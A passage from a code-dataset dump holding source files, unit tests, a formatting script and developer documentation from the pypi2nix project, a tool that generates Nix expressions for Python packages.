List[Path],\n ) -> None:\n pass\n\n @abstractmethod\n def install(\n self,\n requirements: RequirementSet,\n source_directories: List[Path],\n target_directory: Path,\n ) -> None:\n pass\n\n @abstractmethod\n def freeze(self, python_path: List[Path]) -> str:\n pass\n" }, { "alpha_fraction": 0.5799742341041565, "alphanum_fraction": 0.5812626481056213, "avg_line_length": 30.587209701538086, "blob_id": "4e82e2ffe09fbd642483194ae5652257c59c08f9", "content_id": "b75c83a7ff18e19ba5931f64dbbf2530539398b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5433, "license_type": "no_license", "max_line_length": 88, "num_lines": 172, "path": "/src/pypi2nix/utils.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport shlex\nimport subprocess\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport click\nfrom nix_prefetch_github import nix_prefetch_github\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.path import Path\n\nNixOption = Union[str, List[str], bool, Path, List[Path]]\n\nHERE = os.path.dirname(__file__)\n\n\ndef pretty_option(option: Optional[str]) -> str:\n if option is None:\n return \"\"\n else:\n return \" [value: {}]\".format(\n type(option) in [list, tuple] and \" \".join(option) or option\n )\n\n\ndef cmd(\n command: Union[str, List[str]],\n logger: Logger,\n stderr: Optional[int] = None,\n cwd: Optional[str] = None,\n) -> Tuple[int, str]:\n if isinstance(command, str):\n command = shlex.split(command)\n\n logger.debug(\"|-> \" + \" \".join(map(shlex.quote, command)))\n\n p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=stderr, cwd=cwd)\n\n try:\n out = []\n while True:\n line = p.stdout.readline().decode()\n if line == \"\" and p.poll() is not None:\n break\n if line != \"\":\n logger.debug(\" \" + line.rstrip(\"\\n\"))\n out.append(line)\n except Exception:\n p.kill()\n raise\n else:\n p.communicate()\n return p.returncode, \"\".join(out)\n\n\ndef create_command_options(options: Dict[str, NixOption],) -> List[str]:\n command_options = []\n for name, value in options.items():\n if isinstance(value, (str, Path)):\n command_options.append(\"--argstr\")\n command_options.append(name)\n command_options.append(str(value))\n elif isinstance(value, list) or isinstance(value, tuple):\n value = \"[ %s ]\" % (\" \".join(['\"%s\"' % x for x in value]))\n command_options.append(\"--arg\")\n command_options.append(name)\n command_options.append(value)\n elif isinstance(value, bool):\n command_options.append(\"--arg\")\n command_options.append(name)\n command_options.append(\"true\" if value else \"false\")\n return command_options\n\n\ndef args_as_list(inputs: List[str]) -> List[str]:\n return list(filter(lambda x: x != \"\", (\" \".join(inputs)).split(\" \")))\n\n\ndef prefetch_git(url: str, rev: Optional[str] = None) -> Dict[str, str]:\n command = [\"nix-prefetch-git\", url]\n\n if rev is not None:\n command += [\"--rev\", rev]\n try:\n completed_proc = subprocess.run(\n command,\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n except FileNotFoundError:\n raise click.ClickException(\n \"Could not find executable `nix-prefetch-git`. \"\n \"Make sure it is installed correctly and available in \"\n \"$PATH.\"\n )\n\n returncode = completed_proc.returncode\n\n if returncode != 0:\n raise click.ClickException(\n (\n \"Could not fetch git repository at {url}, git returncode was \"\n \"{code}. stdout:\\n{stdout}\\nstderr:\\n{stderr}\"\n ).format(\n url=url,\n code=returncode,\n stdout=completed_proc.stdout,\n stderr=completed_proc.stderr,\n )\n )\n repo_data = json.loads(completed_proc.stdout)\n return repo_data # type: ignore\n\n\ndef prefetch_hg(url: str, logger: Logger, rev: Optional[str] = None) -> Dict[str, str]:\n command = [\"nix-prefetch-hg\", url] + ([rev] if rev else [])\n return_code, output = cmd(command, logger, stderr=subprocess.STDOUT)\n if return_code != 0:\n raise click.ClickException(\n \" \".join(\n [\n \"Could not fetch hg repository at {url}, returncode was {code}.\"\n \"output:\\n {output}\"\n ]\n ).format(url=url, code=return_code, output=output)\n )\n HASH_PREFIX = \"hash is \"\n REV_PREFIX = \"hg revision is \"\n hash_value = None\n revision = None\n for output_line in output.splitlines():\n output_line = output_line.strip()\n if output_line.startswith(HASH_PREFIX):\n hash_value = output_line[len(HASH_PREFIX) :].strip()\n elif output_line.startswith(REV_PREFIX):\n revision = output_line[len(REV_PREFIX) :].strip()\n\n if hash_value is None:\n raise click.ClickException(\n \"Could not determine the hash from ouput:\\n{output}\".format(output=output)\n )\n if revision is None:\n raise click.ClickException(\n \"Could not determine the revision from ouput:\\n{output}\".format(\n output=output\n )\n )\n return {\"sha256\": hash_value, \"revision\": revision}\n\n\ndef prefetch_github(owner: str, repo: str, rev: Optional[str] = None) -> Dict[str, str]:\n return nix_prefetch_github(owner, repo, rev=rev)\n\n\ndef escape_double_quotes(text: str) -> str:\n return text.replace('\"', '\\\\\"')\n\n\ndef prefetch_url(url: str, logger: Logger, name: Optional[str] = None) -> str:\n command = [\"nix-prefetch-url\", url]\n if name is not None:\n command += [\"--name\", name]\n returncode, output = cmd(command, logger, stderr=subprocess.DEVNULL)\n if not output:\n raise ValueError(f\"Could not fetch ressource from {url}\")\n return output.rstrip()\n" }, { "alpha_fraction": 0.7268907427787781, "alphanum_fraction": 0.7333548665046692, "avg_line_length": 37.197532653808594, "blob_id": "0c02e8770c3e7a997443c3bcb9f7885d411b476e", "content_id": "e4b1d21e1cea1651e04df59bd2258e34551c94e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3101, "license_type": "no_license", "max_line_length": 70, "num_lines": 81, "path": "/source/development.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "Help developing pypi2nix\n------------------------\n\nClone `pypi2nix repository`_ and using the ``nix-shell`` command enter\ndevelopment environment.::\n\n % git clone https://github.com/nix-community/pypi2nix\n % cd pypi2nix\n % nix-shell\n\nCode is located in ``src/pypi2nix``.\n\nTesting\n^^^^^^^\n\nPypi2nix comes with two kinds of tests: unit tests and integration\ntests. They can be found in the folders ``/unittests`` and\n``/integrationtests`` respectively.\n\nUnit tests are straight forward. They are run via `pytest`_ and (try\nto) follow `pytest`_ best practices. Idealy all of pypi2nix's code\nshould be covered by unittests. If possible unittests should not go\nonline and fetch data from the internet. If this cannot be avoided\nuse the ``@nix`` decorator, found in ``unittests.switches`` to mark\ntests that require network access.\n\nIntegration tests\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nIntegration tests are a little bit more involved. We implemented a\nsmall framework to write new tests and maintain old ones. Check out\n``integrationtests.framework`` for information on how to write custom\nintegration tests. To run all integration tests run\n``run_integration_tests.py`` from the ``scripts`` directory. If you\nuse ``nix-shell`` to create your development environment then the\n``scripts`` directory should be in you ``PATH`` variable.\n\nPlease note that all integration test cases are classes deriving from\n``integrationtests.framework.IntegrationTest``. Also all these tests\nmust end with ``TestCase``, e.g. ``MyCustomTestCase``.\n\nMaintainance scripts\n^^^^^^^^^^^^^^^^^^^^\n\nThe ``scripts`` folder contains programs that help to maintain the\nrepository. We expect the user to have all the packages from the\nbuild environment of pypi2nix installed. We register the ``scripts``\ndirectory in the users ``PATH`` if they choose to enter ``nix-shell``\nin the top level directory of this project. All maintainance scripts\nshould offer a list of legal command line arguments via the ``--help``\nflag.\n\nVersion bumping\n^^^^^^^^^^^^^^^\n\nWe use ``bumpv`` to manage the current version of this project. This\nprogram should be part of the development environment.\n\nCode formatting\n^^^^^^^^^^^^^^^\n\nWe try to automate as much code formatting as possible. For python\nsource code we use ``black`` and ``isort``. For nix source code we\nuse ``nixfmt``. Both tools are available in development environment\nprovided by ``nix-shell``. The continous integration system will\ncomplain if the code is not formatted properly and the package won't\nbuild. You can automatically format all code via the\n``format_sources.py`` program. You can run it like any other\nmaintainance script from any working directory you like as long as you\nare inside the provided ``nix-shell`` environment. Example::\n\n [nix-shell:~/src/pypi2nix]$ format_sources.py\n Skipped 2 files\n All done! ✨ 🍰 ✨\n 131 files left unchanged.\n Success: no issues found in 47 source files\n Success: no issues found in 122 source files\n\n\n.. _`pytest`: https://pytest.org\n.. _`pypi2nix repository`: https://github.com/nix-community/pypi2nix\n" }, { "alpha_fraction": 0.7258612513542175, "alphanum_fraction": 0.7345948815345764, "avg_line_length": 30.707693099975586, "blob_id": "45f5224191917939ae37e675efa0872873fff93a", "content_id": "e2ccbd5b43abf422b82db19c32e85e8002b78795", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2061, "license_type": "permissive", "max_line_length": 85, "num_lines": 65, "path": "/unittests/test_wheel_builder.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import List\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.metadata_fetcher import MetadataFetcher\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\nfrom pypi2nix.wheel_builder import WheelBuilder\n\nfrom .switches import nix\n\n\n@pytest.fixture\ndef build_wheels(\n wheel_builder: WheelBuilder,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n sources_for_test_packages: Sources,\n pypi: Pypi,\n):\n def wrapper(requirement_lines: List[str]) -> List[Wheel]:\n requirements = RequirementSet(current_platform)\n for line in requirement_lines:\n requirements.add(requirement_parser.parse(line))\n wheel_paths = wheel_builder.build(requirements)\n metadata_fetcher = MetadataFetcher(\n sources_for_test_packages, logger, requirement_parser, pypi\n )\n return metadata_fetcher.main(\n wheel_paths, current_platform, wheel_builder.source_distributions\n )\n\n return wrapper\n\n\n@nix\ndef test_extracts_myextra_dependencies_from_package3(build_wheels,):\n wheels = build_wheels([\"package3[myextra]\"])\n assert [wheel for wheel in wheels if wheel.name == \"package1\"]\n\n\n@nix\ndef test_does_not_package_myextra_dependencies_if_no_extras_specified(build_wheels,):\n wheels = build_wheels([\"package3\"])\n assert not [wheel for wheel in wheels if wheel.name == \"package1\"]\n\n\n@nix\ndef test_does_detect_extra_requirements_from_requirements(build_wheels):\n wheels = build_wheels([\"package4\"])\n assert [wheel for wheel in wheels if wheel.name == \"package1\"]\n\n\n@nix\ndef test_that_we_filter_extra_requirements_that_do_not_apply_to_target_platform(\n build_wheels,\n):\n wheels = build_wheels([\"package3[other_platform]\"])\n assert not [wheel for wheel in wheels if wheel.name == \"package2\"]\n" }, { "alpha_fraction": 0.6677631735801697, "alphanum_fraction": 0.6677631735801697, "avg_line_length": 26.636363983154297, "blob_id": "3dc9be8d3fdbc00ed641271691a956e01a1e3202", "content_id": "267217efe40815b594b18db6c5c561ad0ae8fc3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 81, "num_lines": 22, "path": "/mypy/parsley.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import overload\n\nclass ParseError(Exception):\n def formatError(self) -> str: ...\n\n@overload\ndef makeGrammar(source: str, bindings: Dict[str, Callable[..., Any]]) -> Any: ...\n@overload\ndef makeGrammar(\n source: str, bindings: Dict[str, Callable[..., Any]], name: str\n) -> Any: ...\n@overload\ndef makeGrammar(\n source: str, bindings: Dict[str, Callable[..., Any]], unwrap: bool\n) -> Any: ...\n@overload\ndef makeGrammar(\n source: str, bindings: Dict[str, Callable[..., Any]], name: str, unwrap: bool\n) -> Any: ...\n" }, { "alpha_fraction": 0.6474584341049194, "alphanum_fraction": 0.6504912972450256, "avg_line_length": 39.014564514160156, "blob_id": "0a8f87d5ccebc127574461813e09fc15c47514d5", "content_id": "631e481f1e8f74ac546580fd50b7bd0aa0ccc7c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8243, "license_type": "no_license", "max_line_length": 84, "num_lines": 206, "path": "/src/pypi2nix/main.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\nimport sys\nfrom typing import List\n\nfrom pypi2nix.configuration import ApplicationConfiguration\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.expression_renderer import render_expression\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.external_dependency_collector import ExternalDependencyCollector\nfrom pypi2nix.external_dependency_collector import RequirementDependencyRetriever\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.memoize import memoize\nfrom pypi2nix.metadata_fetcher import MetadataFetcher\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.pip import NixPip\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements_collector import RequirementsCollector\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import PlatformGenerator\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.version import pypi2nix_version\nfrom pypi2nix.wheel_builder import WheelBuilder\n\n\nclass Pypi2nix:\n def __init__(self, configuration: ApplicationConfiguration) -> None:\n self.configuration = configuration\n\n def run(self) -> None:\n requirements = self.requirements_collector().requirements()\n self.logger().info(\"pypi2nix v{} running ...\".format(pypi2nix_version))\n if not requirements:\n self.logger().info(\"No requirements were specified. Ending program.\")\n return\n\n setup_requirements = self.setup_requirements_collector().requirements()\n requirements_name = os.path.join(\n self.configuration.target_directory, self.configuration.output_basename\n )\n\n sources = Sources()\n sources.update(setup_requirements.sources())\n sources.update(requirements.sources())\n sources.update(self.setup_requirements_collector().sources())\n sources.update(self.requirements_collector().sources())\n\n self.logger().info(\"Downloading wheels and creating wheelhouse ...\")\n\n pip = NixPip(\n nix=self.nix(),\n project_directory=self.configuration.project_directory,\n extra_env=self.configuration.extra_environment,\n extra_build_inputs=self._extra_build_inputs(),\n wheels_cache=self.configuration.wheels_caches,\n target_platform=self.target_platform(),\n logger=self.logger(),\n requirement_parser=self.requirement_parser(),\n )\n wheel_builder = WheelBuilder(\n pip=pip,\n download_directory=self.configuration.project_directory / \"downloads\",\n lib_directory=self.configuration.project_directory / \"lib\",\n extracted_wheel_directory=self.configuration.project_directory\n / \"extracted-wheels\",\n wheel_directory=self.configuration.project_directory / \"wheels\",\n logger=self.logger(),\n requirement_parser=self.requirement_parser(),\n target_platform=self.target_platform(),\n base_dependency_graph=self.base_dependency_graph(),\n )\n wheels = wheel_builder.build(\n requirements=requirements, setup_requirements=setup_requirements\n )\n requirements_frozen = wheel_builder.get_frozen_requirements()\n source_distributions = wheel_builder.source_distributions\n\n self.logger().info(\"Extracting metadata from pypi.python.org ...\")\n\n metadata_fetcher = MetadataFetcher(\n sources=sources,\n logger=self.logger(),\n requirement_parser=self.requirement_parser(),\n pypi=Pypi(logger=self.logger()),\n )\n\n packages_metadata = metadata_fetcher.main(\n wheel_paths=wheels,\n target_platform=self.target_platform(),\n source_distributions=source_distributions,\n )\n self.logger().info(\"Generating Nix expressions ...\")\n\n render_expression(\n packages_metadata=packages_metadata,\n sources=sources,\n requirements_name=requirements_name,\n requirements_frozen=requirements_frozen,\n extra_build_inputs=(\n self.configuration.extra_build_inputs\n if self.configuration.emit_extra_build_inputs\n else []\n ),\n enable_tests=self.configuration.enable_tests,\n python_version=self.configuration.python_version,\n target_directory=self.configuration.target_directory,\n logger=self.logger(),\n common_overrides=self.configuration.overrides,\n target_platform=self.target_platform(),\n )\n if self.configuration.dependency_graph_output_location:\n dependency_graph = DependencyGraph()\n for wheel in packages_metadata:\n dependency_graph.import_wheel(wheel, self.requirement_parser())\n with open(\n str(self.configuration.dependency_graph_output_location), \"w\"\n ) as output_file:\n output_file.write(dependency_graph.serialize())\n self.print_user_information()\n\n def print_user_information(self) -> None:\n self.logger().info(\n \"\\n\".join(\n [\n \"\",\n \"Nix expressions generated successfully.\",\n \"\",\n \"To start development run:\",\n \" nix-shell requirements.nix -A interpreter\",\n \"\",\n \"More information you can find at\",\n \" https://github.com/nix-community/pypi2nix\",\n \"\",\n ]\n )\n )\n\n @memoize\n def _extra_build_inputs(self) -> List[ExternalDependency]:\n retriever = RequirementDependencyRetriever()\n collector = ExternalDependencyCollector(\n requirement_dependency_retriever=retriever\n )\n for external_input in self.configuration.extra_build_inputs:\n collector.collect_explicit(external_input)\n return list(collector.get_collected())\n\n @memoize\n def requirements_collector(self) -> RequirementsCollector:\n requirement_collector = RequirementsCollector(\n self.target_platform(),\n self.requirement_parser(),\n self.logger(),\n str(self.configuration.project_directory),\n self.base_dependency_graph(),\n )\n for item in self.configuration.requirements:\n requirement_collector.add_line(item)\n for requirement_file_path in self.configuration.requirement_files:\n requirement_collector.add_file(requirement_file_path)\n return requirement_collector\n\n @memoize\n def setup_requirements_collector(self) -> RequirementsCollector:\n setup_requirement_collector = RequirementsCollector(\n self.target_platform(),\n self.requirement_parser(),\n self.logger(),\n str(self.configuration.project_directory),\n DependencyGraph(),\n )\n for build_input in self.configuration.setup_requirements:\n setup_requirement_collector.add_line(build_input)\n return setup_requirement_collector\n\n @memoize\n def requirement_parser(self) -> RequirementParser:\n return RequirementParser(self.logger())\n\n @memoize\n def target_platform(self) -> TargetPlatform:\n platform_generator = PlatformGenerator(nix=self.nix(), logger=self.logger())\n target_platform = platform_generator.from_python_version(\n self.configuration.python_version\n )\n return target_platform\n\n @memoize\n def nix(self) -> Nix:\n return Nix(\n nix_path=self.configuration.nix_path,\n executable_directory=self.configuration.nix_executable_directory,\n logger=self.logger(),\n )\n\n @memoize\n def logger(self) -> Logger:\n logger: Logger = StreamLogger(output=sys.stdout)\n logger.set_verbosity(self.configuration.verbosity)\n return logger\n\n @memoize\n def base_dependency_graph(self) -> DependencyGraph:\n return self.configuration.dependency_graph_input\n" }, { "alpha_fraction": 0.657681941986084, "alphanum_fraction": 0.698113203048706, "avg_line_length": 36.099998474121094, "blob_id": "04617ef9f71d7b01b5e3e0082536b8d5f9b57fc4", "content_id": "3d4d03e80e612a27fc353c47976f3e06d6ebecc6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 742, "license_type": "permissive", "max_line_length": 109, "num_lines": 20, "path": "/unittests/regression/test_issue_363.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "\"\"\"Regression test for https://github.com/nix-community/pypi2nix/issues/363\"\"\"\nfrom pypi2nix.requirement_parser import RequirementParser\n\n\ndef test_can_parse_enum_requirement_from_issue_363(\n requirement_parser: RequirementParser,\n):\n requirement = requirement_parser.parse(\n \"enum34 (>=1.0.4) ; (python_version=='2.7' or python_version=='2.6' or python_version=='3.3')\"\n )\n assert requirement.name() == \"enum34\"\n\n\ndef test_can_parse_pyinotify_requirement_from_issue_363(\n requirement_parser: RequirementParser,\n):\n requirement = requirement_parser.parse(\n \"pyinotify (>=0.9.6) ; (sys_platform!='win32' and sys_platform!='darwin' and sys_platform!='sunos5')\"\n )\n assert requirement.name() == \"pyinotify\"\n" }, { "alpha_fraction": 0.735144317150116, "alphanum_fraction": 0.7504244446754456, "avg_line_length": 31.72222137451172, "blob_id": "6d732d8fa189344ecd1b6930fc83c62c2a96857a", "content_id": "b24ab5c8aa1eb58be2e948c1c5f59eba4dd47cb7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 589, "license_type": "permissive", "max_line_length": 77, "num_lines": 18, "path": "/unittests/test_license.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.license import license_from_string\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.wheel import Wheel\n\nfrom .logger import get_logger_output\n\n\ndef test_license_from_string_detects_apache_2_0() -> None:\n assert license_from_string(\"Apache 2.0\") == \"licenses.asl20\"\n\n\ndef test_license_from_string_detects_bsd_dash_licenses() -> None:\n assert license_from_string(\"BSD - whatever\") == \"licenses.bsdOriginal\"\n\n\ndef test_that_license_of_flit_is_detected(flit_wheel: Wheel, logger: Logger):\n assert flit_wheel.license\n assert \"WARNING\" not in get_logger_output(logger)\n" }, { "alpha_fraction": 0.7074969410896301, "alphanum_fraction": 0.710364580154419, "avg_line_length": 29.512500762939453, "blob_id": "f6f5b40529c45fcd7777441574b61dd38efcdd1e", "content_id": "d934c7b84a8e909abececb78f3e5ff5263856f6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2441, "license_type": "permissive", "max_line_length": 88, "num_lines": 80, "path": "/unittests/test_dependency_graph_serialization.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from io import StringIO\n\nfrom hypothesis import given\nfrom hypothesis.strategies import booleans\nfrom hypothesis.strategies import composite\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import lists\nfrom hypothesis.strategies import text\n\nfrom pypi2nix.dependency_graph import CyclicDependencyOccured\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.requirements import VersionRequirement\n\nlogger = StreamLogger(output=StringIO())\n\n\n@composite\ndef requirement(draw, name=text(min_size=1)):\n return VersionRequirement(\n name=draw(name),\n logger=logger,\n versions=[],\n extras=set(),\n environment_markers=None,\n )\n\n\n@composite\ndef external_dependency(draw, attribute_name=text(min_size=1)):\n return ExternalDependency(attribute_name=draw(attribute_name))\n\n\n@composite\ndef dependency_graph(\n draw,\n python_packages=lists(requirement(), unique_by=lambda x: x.name()),\n external_dependencies=lists(external_dependency()),\n is_runtime_dependency=booleans(),\n selections=integers(),\n):\n graph = DependencyGraph()\n packages = draw(python_packages)\n if not packages:\n return graph\n for package in packages:\n index = draw(selections) % len(packages)\n try:\n if draw(is_runtime_dependency):\n graph.set_runtime_dependency(\n dependent=package, dependency=packages[index]\n )\n else:\n graph.set_buildtime_dependency(\n dependent=package, dependency=packages[index]\n )\n except CyclicDependencyOccured:\n continue\n for dependency in draw(external_dependencies):\n graph.set_external_dependency(\n dependent=packages[draw(selections) % len(packages)], dependency=dependency\n )\n return graph\n\n\n@given(dependency_graph=dependency_graph())\ndef test_equality_to_self(dependency_graph):\n assert dependency_graph == dependency_graph\n\n\ndef test_equality_of_empty_graphs():\n assert DependencyGraph() == DependencyGraph()\n\n\n@given(dependency_graph=dependency_graph())\ndef test_serialization_and_deserialization_leads_to_identity(\n dependency_graph: DependencyGraph,\n):\n assert DependencyGraph.deserialize(dependency_graph.serialize()) == dependency_graph\n" }, { "alpha_fraction": 0.5541049242019653, "alphanum_fraction": 0.5556113719940186, "avg_line_length": 30.61111068725586, "blob_id": "695319e5cafd716cfddee1aa2481a35a86094c15", "content_id": "c1f97d430bfc03f2694e46df435a9e64cb1b9303", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3983, "license_type": "no_license", "max_line_length": 87, "num_lines": 126, "path": "/src/pypi2nix/nix.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.utils import NixOption\nfrom pypi2nix.utils import cmd\nfrom pypi2nix.utils import create_command_options\n\n\nclass ExecutableNotFound(FileNotFoundError):\n pass\n\n\nclass EvaluationFailed(Exception):\n def __init__(self, *args, output: Optional[str] = None, **kwargs): # type: ignore\n super().__init__(self, *args, **kwargs) # type: ignore\n self.output: Optional[str] = output\n\n\nclass Nix:\n def __init__(\n self,\n logger: Logger,\n nix_path: List[str] = [],\n executable_directory: Optional[str] = None,\n ):\n self.nix_path = nix_path\n self.executable_directory = executable_directory\n self.logger = logger\n\n def evaluate_expression(self, expression: str) -> str:\n output = self.run_nix_command(\n \"nix-instantiate\", [\"--eval\", \"--expr\", expression]\n )\n # cut off the last newline character append to the output\n return output[:-1]\n\n def shell(\n self,\n command: str,\n derivation_path: str,\n nix_arguments: Dict[str, NixOption] = {},\n pure: bool = True,\n ) -> str:\n output = self.run_nix_command(\n \"nix-shell\",\n create_command_options(nix_arguments)\n + ([\"--pure\"] if pure else [])\n + [derivation_path, \"--run\", command],\n )\n return output\n\n def build(\n self,\n source_file: str,\n attribute: Optional[str] = None,\n out_link: Optional[str] = None,\n arguments: Dict[str, NixOption] = dict(),\n ) -> None:\n self.run_nix_command(\n \"nix-build\",\n [source_file]\n + ([\"-o\", out_link] if out_link else [])\n + ([\"-A\", attribute] if attribute else [])\n + create_command_options(arguments),\n )\n\n def evaluate_file(self, source_file: str, attribute: Optional[str] = None) -> None:\n absolute_source_file = os.path.abspath(source_file)\n self.evaluate_expression(\n f\"let file_path = {absolute_source_file}; \"\n + \"file_expression = import file_path {}; \"\n + \"in \"\n + f\"file_expression.{attribute}\"\n if attribute\n else \"file_expression\",\n )\n\n def build_expression(\n self,\n expression: str,\n out_link: Optional[str] = None,\n arguments: Dict[str, NixOption] = dict(),\n ) -> None:\n self.run_nix_command(\n \"nix-build\",\n [\"--expr\", expression]\n + ([\"-o\", out_link] if out_link else [\"--no-out-link\"])\n + create_command_options(arguments),\n )\n\n def run_nix_command(self, binary_name: str, command: List[str]) -> str:\n final_command = (\n [self.executable_path(binary_name)] + self.nix_path_arguments() + command\n )\n returncode: int\n output: str\n try:\n returncode, output = cmd(final_command, self.logger)\n except FileNotFoundError:\n raise ExecutableNotFound(\n \"Could not find executable '{program}'\".format(program=binary_name)\n )\n if returncode != 0:\n raise EvaluationFailed(\n \"'{program}' exited with non-zero exit code ({code}).\".format(\n program=binary_name, code=returncode\n ),\n output=output,\n )\n return output\n\n def nix_path_arguments(self) -> List[str]:\n path_arguments = []\n for path in self.nix_path:\n path_arguments.append(\"-I\")\n path_arguments.append(path)\n return path_arguments\n\n def executable_path(self, program_name: str) -> str:\n if self.executable_directory is None:\n return program_name\n else:\n return os.path.join(self.executable_directory, program_name)\n" }, { "alpha_fraction": 0.5887500047683716, "alphanum_fraction": 0.5912500023841858, "avg_line_length": 29.37974739074707, "blob_id": "7a5eeb8e6dd4d857aa348ea0ac5d623020750169", "content_id": "448b756b9124ade40826753c3c7f7ac483197324", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2400, "license_type": "no_license", "max_line_length": 88, "num_lines": 79, "path": "/scripts/format_sources.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport os.path\nimport subprocess\nimport sys\nfrom typing import List\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom repository import ROOT\n\n\nclass CodeFormatter:\n def __init__(self):\n self._logger = initialize_logger()\n\n def main(self):\n relative_paths = [\n \"src\",\n \"unittests\",\n \"integrationtests\",\n \"conftest.py\",\n \"setup.py\",\n \"mypy\",\n \"scripts\",\n ]\n self.format_nix_files()\n absolute_paths = [os.path.join(ROOT, relative) for relative in relative_paths]\n self._logger.info(\"Running isort\")\n subprocess.run([\"isort\", \"-rc\", \".\"], check=True)\n self._logger.info(\"Running black\")\n subprocess.run([\"black\"] + absolute_paths, check=True)\n self.run_check_process(\"flake8\")\n self.run_check_process(\"mypy\")\n\n def run_check_process(self, executable, arguments: List[str] = []):\n self._logger.info(f\"Running {executable}\")\n try:\n subprocess.run([executable] + arguments, check=True)\n except subprocess.CalledProcessError:\n self._logger.error(f\"{executable} failed, see errors above\")\n exit(1)\n\n def format_nix_files(self) -> None:\n if is_nixfmt_installed():\n self._logger.info(\"Formatting nix files\")\n integration_test_nix_files = find_nix_files_in_integration_tests()\n subprocess.run(\n [\"nixfmt\", \"default.nix\", \"src/pypi2nix/pip/bootstrap.nix\"]\n + integration_test_nix_files,\n check=True,\n )\n else:\n self._logger.warning(\n \"Could not find `nixfmt` executable. Cannot format .nix files\"\n )\n\n\ndef find_nix_files_in_integration_tests() -> List[str]:\n found_files: List[str] = []\n for root, _, files in os.walk(\"integrationtests\"):\n found_files += [\n os.path.join(root, file) for file in files if file.endswith(\".nix\")\n ]\n return found_files\n\n\ndef initialize_logger() -> Logger:\n return StreamLogger(output=sys.stdout)\n\n\ndef is_nixfmt_installed() -> bool:\n process_result = subprocess.run(\"nixfmt --version\", shell=True, capture_output=True)\n return process_result.returncode == 0\n\n\nif __name__ == \"__main__\":\n CodeFormatter().main()\n" }, { "alpha_fraction": 0.6570205688476562, "alphanum_fraction": 0.6653760075569153, "avg_line_length": 32.84138107299805, "blob_id": "eb281b93deea115d4aca6f7ae4b1534b2e7106f0", "content_id": "f8b53b4b4b2078a81441dc2bc2805a8de3789fd8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4907, "license_type": "permissive", "max_line_length": 119, "num_lines": 145, "path": "/unittests/test_target_platform.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport os.path\nimport platform\nimport sys\nfrom collections import namedtuple\n\nimport pytest\nfrom packaging.markers import default_environment\n\nfrom pypi2nix.environment_marker import EnvironmentMarker\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.target_platform import PlatformGenerator\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .switches import nix\n\n\ndef format_full_version(info):\n version = \"{0.major}.{0.minor}.{0.micro}\".format(info)\n kind = info.releaselevel\n if kind != \"final\":\n version += kind[0] + str(info.serial)\n return version\n\n\n@pytest.fixture\ndef python_3_environment_nix(tmp_path_factory):\n directory = str(tmp_path_factory.mktemp(\"python_3_environment\"))\n path = os.path.join(directory, \"environment.nix\")\n with open(path, \"w\") as f:\n f.write(\n \" 